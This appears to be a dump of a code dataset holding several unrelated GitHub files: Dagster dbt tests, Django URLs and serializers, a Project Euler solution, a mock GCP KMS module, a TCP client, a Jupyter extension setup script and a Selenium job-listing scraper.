AssetKey([\"prefix\", \"subdir_schema\", \"least_caloric\"]),\n AssetKey([\"prefix\", \"orders_snapshot\"]),\n AssetKey([\"prefix\", \"sort_hot_cereals_by_calories\"]),\n AssetKey([\"prefix\", \"sort_by_calories\"]),\n }\n\n\n@pytest.mark.parametrize(\n \"partition_mapping\",\n [\n None,\n LastPartitionMapping(),\n TimeWindowPartitionMapping(start_offset=-1, end_offset=-1),\n ],\n)\ndef test_with_partition_mappings(partition_mapping: Optional[PartitionMapping]) -> None:\n expected_self_dependency_partition_mapping = TimeWindowPartitionMapping(\n start_offset=-8, end_offset=-9\n )\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_partition_mapping(\n cls,\n dbt_resource_props: Mapping[str, Any],\n dbt_parent_resource_props: Mapping[str, Any],\n ) -> Optional[PartitionMapping]:\n is_self_dependency = dbt_resource_props == dbt_parent_resource_props\n if is_self_dependency:\n return expected_self_dependency_partition_mapping\n\n return partition_mapping\n\n @dbt_assets(\n manifest=test_dagster_metadata_manifest,\n dagster_dbt_translator=CustomizedDagsterDbtTranslator(),\n partitions_def=DailyPartitionsDefinition(start_date=\"2023-10-01\"),\n )\n def my_dbt_assets():\n ...\n\n dependencies_with_self_dependencies = {\n # Self dependency enabled with `+meta.dagster.has_self_dependency`\n AssetKey(\"customers\"),\n }\n dependencies_without_self_dependencies = set(my_dbt_assets.dependency_keys).difference(\n my_dbt_assets.keys\n )\n\n assert dependencies_without_self_dependencies\n for input_asset_key in dependencies_without_self_dependencies:\n assert my_dbt_assets.get_partition_mapping(input_asset_key) == partition_mapping\n\n for self_dependency_asset_key in dependencies_with_self_dependencies:\n assert (\n my_dbt_assets.get_partition_mapping(self_dependency_asset_key)\n == expected_self_dependency_partition_mapping\n )\n\n\ndef test_with_description_replacements() -> None:\n expected_description = \"customized description\"\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_description(cls, dbt_resource_props: Mapping[str, Any]) -> str:\n return expected_description\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for description in my_dbt_assets.descriptions_by_key.values():\n assert description == expected_description\n\n\ndef test_with_metadata_replacements() -> None:\n expected_metadata = {\"customized\": \"metadata\"}\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_metadata(cls, dbt_resource_props: Mapping[str, Any]) -> Mapping[str, Any]:\n return expected_metadata\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for metadata in my_dbt_assets.metadata_by_key.values():\n assert metadata[\"customized\"] == \"metadata\"\n\n\ndef test_with_group_replacements() -> None:\n expected_group = \"customized_group\"\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_group_name(cls, dbt_resource_props: Mapping[str, Any]) -> Optional[str]:\n return expected_group\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for group in my_dbt_assets.group_names_by_key.values():\n assert group == expected_group\n\n\ndef test_with_freshness_policy_replacements() -> None:\n expected_freshness_policy = FreshnessPolicy(maximum_lag_minutes=60)\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_freshness_policy(\n cls, dbt_resource_props: Mapping[str, Any]\n ) -> Optional[FreshnessPolicy]:\n return expected_freshness_policy\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for freshness_policy in my_dbt_assets.freshness_policies_by_key.values():\n assert freshness_policy == expected_freshness_policy\n\n\ndef test_with_auto_materialize_policy_replacements() -> None:\n expected_auto_materialize_policy = AutoMaterializePolicy.eager()\n\n class CustomizedDagsterDbtTranslator(DagsterDbtTranslator):\n @classmethod\n def get_auto_materialize_policy(\n cls, dbt_resource_props: Mapping[str, Any]\n ) -> Optional[AutoMaterializePolicy]:\n return expected_auto_materialize_policy\n\n @dbt_assets(manifest=manifest, dagster_dbt_translator=CustomizedDagsterDbtTranslator())\n def my_dbt_assets():\n ...\n\n for auto_materialize_policy in my_dbt_assets.auto_materialize_policies_by_key.values():\n assert auto_materialize_policy == expected_auto_materialize_policy\n\n\ndef test_dbt_meta_auto_materialize_policy() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n auto_materialize_policies = my_dbt_assets.auto_materialize_policies_by_key.values()\n assert auto_materialize_policies\n\n for auto_materialize_policy in auto_materialize_policies:\n assert auto_materialize_policy == AutoMaterializePolicy.eager()\n\n\ndef test_dbt_meta_freshness_policy() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n freshness_policies = my_dbt_assets.freshness_policies_by_key.values()\n assert freshness_policies\n\n for freshness_policy in freshness_policies:\n assert freshness_policy == FreshnessPolicy(\n maximum_lag_minutes=60.0, cron_schedule=\"* * * * *\"\n )\n\n\ndef test_dbt_meta_asset_key() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n # Assert that source asset keys are set properly.\n assert AssetKey([\"customized\", \"source\", \"jaffle_shop\", \"main\", \"raw_customers\"]) in set(\n my_dbt_assets.keys_by_input_name.values()\n )\n\n # Assert that models asset keys are set properly.\n assert {\n AssetKey([\"customized\", \"staging\", \"customers\"]),\n AssetKey([\"customized\", \"staging\", \"orders\"]),\n AssetKey([\"customized\", \"staging\", \"payments\"]),\n }.issubset(my_dbt_assets.keys)\n\n\ndef test_dbt_config_group() -> None:\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n assert my_dbt_assets.group_names_by_key == {\n AssetKey([\"customers\"]): \"default\",\n # If a model has a Dagster group name specified under `meta`, use that.\n AssetKey([\"customized\", \"staging\", \"customers\"]): \"customized_dagster_group\",\n # If a model has a dbt group name specified under `group`, use that.\n AssetKey([\"customized\", \"staging\", \"orders\"]): \"customized_dbt_group\",\n # If a model has both a Dagster group and dbt group, use the Dagster group.\n AssetKey([\"customized\", \"staging\", \"payments\"]): \"customized_dagster_group\",\n AssetKey([\"orders\"]): \"default\",\n AssetKey([\"raw_customers\"]): \"default\",\n AssetKey([\"raw_orders\"]): \"default\",\n AssetKey([\"raw_payments\"]): \"default\",\n }\n\n\ndef test_dbt_with_downstream_asset_via_definition():\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n @asset(deps=[my_dbt_assets])\n def downstream_of_dbt():\n return None\n\n assert len(downstream_of_dbt.input_names) == 8\n for input_name in downstream_of_dbt.input_names:\n assert downstream_of_dbt.op.ins[input_name].dagster_type.is_nothing\n\n\ndef test_dbt_with_downstream_asset():\n @dbt_assets(manifest=test_dagster_metadata_manifest)\n def my_dbt_assets():\n ...\n\n @asset(deps=[AssetKey(\"orders\"), AssetKey([\"customized\", \"staging\", \"payments\"])])\n def downstream_of_dbt():\n return None\n\n assert len(downstream_of_dbt.input_names) == 2\n assert downstream_of_dbt.op.ins[\"orders\"].dagster_type.is_nothing\n assert downstream_of_dbt.op.ins[\"customized_staging_payments\"].dagster_type.is_nothing\n\n\ndef test_dbt_with_python_interleaving() -> None:\n @dbt_assets(manifest=test_python_interleaving_manifest)\n def my_dbt_assets(context: AssetExecutionContext, dbt: DbtCliResource):\n yield from dbt.cli([\"build\"], context=context).stream()\n\n assert set(my_dbt_assets.keys_by_input_name.values()) == {\n AssetKey([\"dagster\", \"python_augmented_customers\"]),\n # these inputs are necessary for copies of this asset to properly reflect the dependencies\n # of this asset when it is automatically subset\n AssetKey(\"raw_customers\"),\n AssetKey(\"raw_orders\"),\n AssetKey(\"raw_payments\"),\n AssetKey(\"stg_orders\"),\n AssetKey(\"stg_payments\"),\n }\n\n @asset(key_prefix=\"dagster\", deps=[\"raw_customers\"])\n def python_augmented_customers():\n ...\n\n defs = Definitions(\n assets=[my_dbt_assets, python_augmented_customers],\n resources={\n \"dbt\": DbtCliResource(\n project_dir=test_python_interleaving_manifest_path.parent.absolute().as_posix()\n )\n },\n )\n global_job = defs.get_implicit_global_asset_job_def()\n # my_dbt_assets gets split up\n assert global_job.dependencies == {\n # no dependencies for the first invocation of my_dbt_assets\n NodeInvocation(name=\"my_dbt_assets\", alias=\"my_dbt_assets_2\"): {},\n # the python augmented customers asset depends on the second invocation of my_dbt_assets\n NodeInvocation(name=\"dagster__python_augmented_customers\"): {\n \"raw_customers\": DependencyDefinition(node=\"my_dbt_assets_2\", output=\"raw_customers\")\n },\n # the second invocation of my_dbt_assets depends on the first, and the python step\n NodeInvocation(name=\"my_dbt_assets\"): {\n \"__subset_input__stg_orders\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_orders\"\n ),\n \"__subset_input__stg_payments\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_payments\"\n ),\n \"dagster_python_augmented_customers\": DependencyDefinition(\n node=\"dagster__python_augmented_customers\", output=\"result\"\n ),\n },\n }\n # two distinct node definitions, but 3 nodes overall\n assert len(global_job.all_node_defs) == 2\n assert len(global_job.nodes) == 3\n\n result = global_job.execute_in_process()\n assert result.success\n\n # now make sure that if you just select these two, we still get a valid dependency graph (where)\n # customers executes after its parent \"stg_orders\", even though the python step is not selected\n subset_job = global_job.get_subset(\n asset_selection={AssetKey(\"stg_orders\"), AssetKey(\"customers\")}\n )\n assert subset_job.dependencies == {\n # no dependencies for the first invocation of my_dbt_assets\n NodeInvocation(name=\"my_dbt_assets\", alias=\"my_dbt_assets_2\"): {},\n # the second invocation of my_dbt_assets depends on the first\n NodeInvocation(name=\"my_dbt_assets\"): {\n \"__subset_input__stg_orders\": DependencyDefinition(\n node=\"my_dbt_assets_2\", output=\"stg_orders\"\n )\n },\n }\n result = subset_job.execute_in_process()\n assert result.success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt_tests/test_asset_decorator.py","file_name":"test_asset_decorator.py","file_ext":"py","file_size_in_byte":21709,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"3472175315","text":"from django.urls import path, re_path\nfrom .views import *\n\nfrom django.views.decorators.cache import cache_page # импортируем декоратор \n#для кэширования отдельного представления\n\nurlpatterns = [\n\n\n # кеширование страницы\n #path('',cache_page(60)( NewsListMain.as_view()), name = 'home' ),\n \n path('', NewsListMain.as_view(), name = 'home' ),\n re_path(r'^index/', NewsListMain.as_view(), name = 'home'),\n re_path(r'^news/', NewsList.as_view(), name = 'news_page' ),\n \n path('', NewsDetail.as_view(), name = 'o_news'),\n path('search', SearchList.as_view(), name = 'search' ),\n\n #path('edit/', cache_page(10)(NewsEditView.as_view()), name = 'edit'),\n path('edit/', NewsEditView.as_view(), name = 'edit'),\n #path('/', NewsDetail.aus_view(), name = 'detail_news'),\n\n #страница закеширована \n #path('add_news/', cache_page(5)(AddNewsCreate.as_view()), name = 'add_news' ),\n path('add_news/', AddNewsCreate.as_view(), name = 'add_news' ),\n \n path('update_news//', NewsUpdateView.as_view(), name = 'edit_news'),\n path('delete//', NewsDeleteView.as_view(), name='news_delete'),\n \n #path('category_news//', NewsCategory.as_view(), name = 'category') тоже работает в строке дает назв категории\n path('category_news/', NewsCategory.as_view(), name = 'category'),\n \n path('subscribe//', subCategory, name ='subcat'),\n path('unsubscribe//', unsubCategory, name ='unsubcat'),\n \n \n #path('one_news/', news, name='one_news'),\n]\n","repo_name":"VetN/moduleD2_homework","sub_path":"NewsPaper/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13169934666","text":"import csv\n\nmovies=dict()\nwith open(\"favorites.csv\",\"r\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n m = row[\"title\"].strip().upper()\n if not m in movies:\n movies[m] = 0\n movies[m]+=1\n\n\nfor m in sorted(movies,key=lambda #function with no name,only one time usage\n title:movies[title]#title - argument, movies(title)-return value\n ,reverse=True):\n print(m,movies[m])","repo_name":"subramanivasu/CS_Learnings","sub_path":"cs50/favourites5.py","file_name":"favourites5.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70474641768","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport shared\nimport collections\nimport math\n\n# By replacing each of the letters in the word CARE with 1, 2, 9, and\n# 6 respectively, we form a square number: 1296 = 362. What is\n# remarkable is that, by using the same digital substitutions, the\n# anagram, RACE, also forms a square number: 9216 = 962. We shall call\n# CARE (and RACE) a square anagram word pair and specify further that\n# leading zeroes are not permitted, neither may a different letter\n# have the same digital value as another letter.\n\n# Using words.txt (right click and 'Save Link/Target As...'), a 16K\n# text file containing nearly two-thousand common English words, find\n# all the square anagram word pairs (a palindromic word is NOT\n# considered to be an anagram of itself).\n\n# What is the largest square number formed by any member of such a\n# pair?\n\n# NOTE: All anagrams formed must be contained in the given text file.\n\nexpected = 18769\n\n# def letter_value(letter):\n# return ord(letter) - 0x40 # ord('A') == 0x41\n\n# def word_value(word):\n# value = 0\n# for letter in word:\n# l = letter_value(letter)\n# value *= 10\n# if l >= 10:\n# value *= 10\n# value += l\n# return value\n \n\ndef are_squares(word1, word2, square):\n replacement_map = {}\n position = -1\n shrinking_square = square\n while shrinking_square > 0:\n shrinking_square, digit = divmod(shrinking_square, 10)\n replacement_map[str(digit)] = word1[position]\n position -= 1\n\n for digit, letter in replacement_map.items():\n word1 = word1.replace(letter, digit)\n\n try:\n if int(word1, 10) != square:\n return False\n except:\n return False\n \n for digit, letter in replacement_map.items():\n word2 = word2.replace(letter, digit)\n \n if word2[0] != '0':\n square2 = int(word2, 10)\n root2 = math.sqrt(square2)\n if int(root2) == root2:\n return True\n return False\n\n\ndef get_highest(word1, word2):\n\n best = 0\n highest_square = 10**len(word1)-1\n lowest_square = highest_square/10+1\n\n lowest_root = int(math.sqrt(lowest_square))\n root = int(math.sqrt(highest_square))\n\n while root > lowest_root:\n square = root**2\n\n if are_squares(word1, word2, square):\n return max(best, square)\n\n if are_squares(word2, word1, square):\n return max(best, square)\n root -= 1\n return 0\n\ndef solve():\n word_groups = collections.defaultdict(list)\n words = file('words.txt').read().replace('\"', '').split(',')\n words.sort(key=len)\n for word in words:\n chars = list(word)\n chars.sort()\n\n if len(chars) <= 10:\n word_groups[tuple(chars)].append(word)\n word_groups = [group for group in word_groups.values() if len(group) > 1]\n word_groups.sort(lambda g1, g2: cmp(len(g2[0]), len(g1[0])))\n\n best = 0\n for group in word_groups:\n for i in range(len(group)):\n for j in range(i+1, len(group)):\n best = max(best, get_highest(group[i], group[j]))\n return best\n","repo_name":"blairconrad/notions","sub_path":"Euler/q00098/q00098.py","file_name":"q00098.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6327976216","text":"from odoo import fields, models, api, _\n\n\nclass ProductTemplateInherit(models.Model):\n _inherit = 'product.template'\n \n invoices_count = fields.Integer(string=\"Sales\", compute=\"get_invoices_count\")\n \n @api.multi\n def open_account_invoice_lines(self):\n return {\n 'name': _('Account Invoice Lines'),\n 'domain': [('product_id', '=', self.id)],\n 'view_type': 'form',\n 'res_model': 'account.invoice.line',\n 'view_id': False,\n 'view_mode': 'tree,form',\n 'type': 'ir.actions.act_window',\n }\n \n def get_invoices_count(self):\n # cur_product_id = self.product_id.id\n report = self.env['account.invoice.line']\n count = report.search_count([('product_id', '=', self.id)])\n self.invoices_count = count\n","repo_name":"darlamichhane/OdooModules","sub_path":"cfc_extra/models/cfc_product.py","file_name":"cfc_product.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30339481117","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_auth.registration.serializers import RegisterSerializer\nfrom allauth.account.adapter import get_adapter\nfrom allauth.account.utils import setup_user_email\n\n\nUser = get_user_model()\nhost_url = 'http://childrenzip.site'\n\nclass UserSerializer(serializers.ModelSerializer):\n profile_image = serializers.SerializerMethodField()\n \n def get_profile_image(self, obj):\n try: img = obj.profile_image.url\n except: return None\n return host_url + img\n\n class Meta:\n model = User\n exclude = ['password']\n\nclass UserListSerializer(serializers.ModelSerializer):\n profile_image = serializers.SerializerMethodField()\n\n def get_profile_image(self, obj):\n try: img = obj.profile_image.url\n except: return None\n return host_url + img\n\n class Meta:\n model = User\n fields = ['id', 'username', 'nickname', 'profile_image']\n\nclass CustomRegisterSerializer(serializers.ModelSerializer, RegisterSerializer):\n class Meta:\n model = User\n fields = [\n 'username', 'email', 'password1', 'password2', 'latitude', 'longitude',\n 'address', 'nickname', 'is_director', 'kindergarten_id', 'profile_image'\n ]\n\n def save(self, request):\n adapter = get_adapter()\n user = adapter.new_user(request)\n self.cleaned_data = self.get_cleaned_data()\n adapter.save_user(request, user, self)\n self.custom_signup(request, user)\n setup_user_email(request, user, [])\n return user\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n profile_image = serializers.ImageField(required=False)\n nickname = serializers.CharField(max_length=50, required=False)\n class Meta:\n model = User\n fields = ['nickname', 'profile_image', 'latitude', 'longitude', 'address']","repo_name":"YongjoonSeo/Children-ZIP","sub_path":"backend/accounts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169732865","text":"import socket\nimport argparse\n\ndef tcp_client(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n data = s.recv(100)\n file = open(\"file2.txt\", 'wb')\n file.write(data)\n\ndef valid_port(port):\n port = int(port)\n if port < 1024 or port >= 64000:\n raise argparse.ArgumentError()\n return port\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\")\n parser.add_argument(\"port\", type=valid_port)\n args = parser.parse_args()\n tcp_client(args.host, args.port)\n","repo_name":"JamesSunshine/TCP_Server","sub_path":"tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10614843827","text":"\"\"\"\nwebio_jupyter_extension setup\n\"\"\"\nimport json\nimport sys\nfrom pathlib import Path\n\nimport setuptools\n\nHERE = Path(__file__).parent.resolve()\n\n# The name of the project\nname = \"webio_jupyter_extension\"\n\nlab_path = (HERE / name.replace(\"-\", \"_\") / \"labextension\")\nnbextension_path = (HERE / name.replace(\"-\", \"_\") / \"nbextension\")\n\n# Representative files that should exist after a successful build\nensured_targets = [\n str(lab_path / \"package.json\"),\n str(lab_path / \"static/style.js\")\n]\n\n# Get the package info from package.json\npkg_json = json.loads((HERE / \"package.json\").read_bytes())\nlabext_name = pkg_json[\"name\"]\n\ndata_files_spec = [\n # labextension files\n (f\"share/jupyter/labextensions/{labext_name}\", str(\".\"), \"install.json\"),\n (f\"share/jupyter/labextensions/{labext_name}\", str(lab_path.relative_to(HERE)), \"**\"),\n\n # nbextension files\n ('share/jupyter/nbextensions/webio-jupyter-nbextension', str(nbextension_path.relative_to(HERE)), '**'),\n ('etc/jupyter/nbconfig/notebook.d' , \"jupyter-config/notebook-config\", 'webio-jupyter-nbextension.json'),\n\n # serverextension files\n (\"etc/jupyter/jupyter_server_config.d\", \"jupyter-config/server-config\", f\"{name}.json\"),\n # For backward compatibility with notebook server\n (\"etc/jupyter/jupyter_notebook_config.d\", \"jupyter-config/nb-config\", f\"{name}.json\"),\n]\n\nlong_description = (HERE / \"README.md\").read_text()\n\n\nsetup_args = dict(\n name=name,\n version=pkg_json[\"version\"],\n description=pkg_json[\"description\"],\n license=pkg_json[\"license\"],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n install_requires=[],\n zip_safe=False,\n include_package_data=True,\n python_requires=\">=3.6\",\n platforms=\"Linux, Mac OS X, Windows\",\n keywords=[\"Jupyter\", \"JupyterLab\", \"JupyterLab3\"],\n classifiers=[\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Framework :: Jupyter\",\n \"Framework :: Jupyter :: JupyterLab\",\n \"Framework :: Jupyter :: JupyterLab :: 3\",\n \"Framework :: Jupyter :: JupyterLab :: Extensions\",\n \"Framework :: Jupyter :: JupyterLab :: Extensions :: Prebuilt\",\n ],\n)\n\ntry:\n from jupyter_packaging import (\n wrap_installers,\n npm_builder,\n get_data_files\n )\n post_develop = npm_builder(\n build_cmd=\"install:extension\", source_dir=\"src\", build_dir=lab_path\n )\n setup_args[\"cmdclass\"] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)\n setup_args[\"data_files\"] = get_data_files(data_files_spec)\nexcept ImportError as e:\n import logging\n logging.basicConfig(format=\"%(levelname)s: %(message)s\")\n logging.warning(\"Build tool `jupyter-packaging` is missing. Install it with pip or conda.\")\n if not (\"--name\" in sys.argv or \"--version\" in sys.argv):\n raise e\n\nif __name__ == \"__main__\":\n setuptools.setup(**setup_args)\n","repo_name":"JuliaGizmos/WebIO.jl","sub_path":"webio_jupyter_extension/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"66"} +{"seq_id":"33545097922","text":"# pylint: disable=redefined-outer-name\nimport pytest\n\nfrom partner_offers import geosearch_parsing\n\n\n@pytest.fixture\ndef search_org_mock_success(patch):\n @patch('partner_offers.geosearch_parsing.search_organization')\n async def _search_organization(\n business_oid: int, lang: str, *args, **kwargs,\n ):\n return (\n geosearch_parsing.OrganizationData(\n name='Магнит',\n logo_uri='https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501,\n chain_id=None,\n ),\n geosearch_parsing.LocationData(\n name='Магнит',\n business_oid=business_oid,\n longitude=50.0,\n latitude=30.0,\n work_times=[],\n timezone_offset=3600,\n country='Россия',\n city='Кукуево',\n formatted_address='Россия, с. Кукуево, ул. Ильича, д. Лампочка', # noqa: E501\n logo_uri='https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501\n chain=None,\n ),\n )\n\n return _search_organization\n\n\n@pytest.fixture\ndef search_org_mock_not_found(patch):\n @patch('partner_offers.geosearch_parsing.search_organization')\n async def _search_organization(*args, **kwargs):\n return None\n\n return _search_organization\n\n\nasync def test_search_organizations(web_app_client, search_org_mock_success):\n business_oid = 1255966696\n uri = f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 200, await response.text()\n content = await response.json()\n expected = {\n 'organizations': [\n {\n 'business_oid': str(business_oid),\n 'logo': 'https://avatars.mds.yandex.net/get-altay/1881734/2a0000016a35aba90cfe1b24c59b99f31939/M', # noqa: E501\n 'name': 'Магнит',\n },\n ],\n }\n assert content == expected\n\n\n@pytest.mark.pgsql('partner_offers', files=['pg_static_data.sql'])\nasync def test_already_has(web_app_client, mockserver):\n # pylint: disable=unused-variable\n\n @mockserver.json_handler('/geocoder/yandsearch')\n def get_by_business_oid(_):\n assert False, 'Must not be called'\n\n business_oid = 123456\n uri = f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 409, await response.text()\n response_json = await response.json()\n del response_json['id']\n expected = {\n 'name': 'Big zombie shop',\n 'logo': 'https://example.com/image.jpg',\n 'deals_related': {'category': 'food', 'comment': 'Some comment text'},\n 'locations': [\n {\n 'name': 'Russia, Moscow',\n 'locations': [\n {\n 'address': 'Москва, Лубянка, 5',\n 'name': 'Big zombie shop',\n 'id': str(business_oid),\n 'map_link': f'https://yandex.ru/maps/?mode=search&ol=biz&oid={business_oid}', # noqa: E501\n },\n ],\n },\n ],\n 'changelog': {\n 'updated_by': 'valery',\n 'updated_at': '2019-05-26T19:10:25+03:00',\n 'created_by': 'valery',\n 'created_at': '2019-05-26T19:10:25+03:00',\n },\n }\n assert response_json == expected\n\n\nasync def test_search_organizations_not_found(\n web_app_client, search_org_mock_not_found,\n):\n business_oid = 123456\n uri = f'/internal/v1/organizations/list?business_oid={business_oid}'\n response = await web_app_client.post(uri)\n assert response.status == 404, await response.text()\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_partner_offers/web/test_search_organizations.py","file_name":"test_search_organizations.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29585148853","text":"\"\"\"\nA mock version of module :mod:`.gcp_kms`.\n\nThe code in this module does not make any external requests.\n\n\"\"\"\nimport base64\nimport uuid\n\nimport cryptography.fernet\n\nfrom .gcp_kms import GcpCredentials, GcpResource # noqa: F401\nfrom .gcp_kms import ( # noqa: F401\n compose_crypto_key_grn,\n compose_crypto_key_version_grn,\n compose_key_ring_grn,\n compose_location_grn,\n compose_project_grn,\n)\nfrom .gcp_kms import ( # noqa: F401\n KMS_LOCATION_ID_MAX_LENGTH_ESTIMATION,\n KMS_KEY_RING_ID_MAX_LENGTH,\n KMS_KEY_RING_ID_REGEX,\n KMS_CRYPTO_KEY_ID_MAX_LENGTH,\n KMS_CRYPTO_KEY_ID_REGEX,\n KMS_ENCRYPTION_PLAIN_DATA_MAX_SIZE,\n)\n\n\n###############################################################################\n# KMS API operations - crypto key\n###############################################################################\n\ndef create_crypto_key(\n api_client: object,\n key_ring_grn: str,\n crypto_key_id: str = None,\n) -> str:\n \"\"\"\n Create a crypto key (mock) within a key ring.\n\n Useful for mocking :func:`.gcp_kms.create_crypto_key`.\n\n :return: crypto key GRN\n\n \"\"\"\n # TODO: see TODOs in '.gcp_kms.create_crypto_key'\n\n crypto_key_id = crypto_key_id or uuid.uuid4().hex\n crypto_key_grn = '{}/cryptoKeys/{}'.format(\n key_ring_grn,\n crypto_key_id,\n )\n\n return crypto_key_grn\n\n\ndef encrypt(\n api_client: object,\n crypto_key_grn: str,\n plain_data: bytes,\n) -> bytes:\n \"\"\"\n Encrypt binary ``plain_data`` locally, without using GCP KMS.\n\n Useful for mocking :func:`.gcp_kms.encrypt`.\n\n \"\"\"\n if not isinstance(plain_data, bytes):\n raise TypeError(\"Type of 'plain_data' is not bytes.\")\n if len(plain_data) > KMS_ENCRYPTION_PLAIN_DATA_MAX_SIZE:\n raise ValueError(\"Size of 'plain_data' exceeds max size.\")\n\n fernet_key_input = crypto_key_grn[-32:].encode(encoding='ascii')\n fernet_key = _generate_fernet_key(fernet_key_input)\n\n f = cryptography.fernet.Fernet(fernet_key)\n encrypted_data: bytes = f.encrypt(plain_data)\n\n return encrypted_data\n\n\ndef decrypt(\n api_client: object,\n crypto_key_grn: str,\n encrypted_data: bytes,\n) -> bytes:\n \"\"\"\n Decrypt binary ``encrypted_data``locally, without using GCP KMS.\n\n Useful for mocking :func:`.gcp_kms.decrypt`.\n\n \"\"\"\n fernet_key_input = crypto_key_grn[-32:].encode(encoding='ascii')\n fernet_key = _generate_fernet_key(fernet_key_input)\n\n f = cryptography.fernet.Fernet(fernet_key)\n plain_data: bytes = f.decrypt(encrypted_data)\n\n return plain_data\n\n\n###############################################################################\n# internal helpers\n###############################################################################\n\ndef _generate_fernet_key(value: bytes) -> bytes:\n # Based on 'cryptography.fernet.Fernet.generate_key'.\n if not isinstance(value, bytes):\n raise TypeError\n if len(value) != 32:\n raise ValueError\n return base64.urlsafe_b64encode(value)\n","repo_name":"fyntex/gcp-utils-python","sub_path":"fd_gcp/gcp_kms_mock.py","file_name":"gcp_kms_mock.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"27054160203","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup as bs4\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nimport getpass\nimport easygui as eg\nfrom tqdm import tqdm\n\n\n# In[2]:\n\n\ndef click(x):\n button = driver.find_element(By.XPATH, x)\n button.click()\n time.sleep(2)\n\n\n# ### scraping from stepstone\n\n# scraping from stepstone.de to get page source of the job results pages (page 1, page 2, page 3, etc.)\n\n# In[3]:\n\n\ndef scrape_pages(url):\n search_result = []\n options = Options()\n options.add_argument('--disable-gpu')\n options.add_argument('user-agent=fake-useragent')\n driver.get(url)\n time.sleep(6)\n ok1 = \"/html/body/div[10]/section/div/section/div[2]/div[1]/div[2]/div\"\n ok2 = \"/html/body/div[9]/section/div/section/div[2]/div[1]/div[2]/div\"\n ok3 = \"/html/body/div[10]/section/div/section/div[2]/div[1]/div[2]\"\n try:\n click(ok1)\n except:\n pass\n try:\n click(ok2)\n except:\n pass\n try:\n click(ok3)\n except:\n pass\n npage = \"/html/body/div[4]/div[1]/div/div/div[2]/div/div[2]/div[3]/div/nav/ul/li[9]/a\"\n 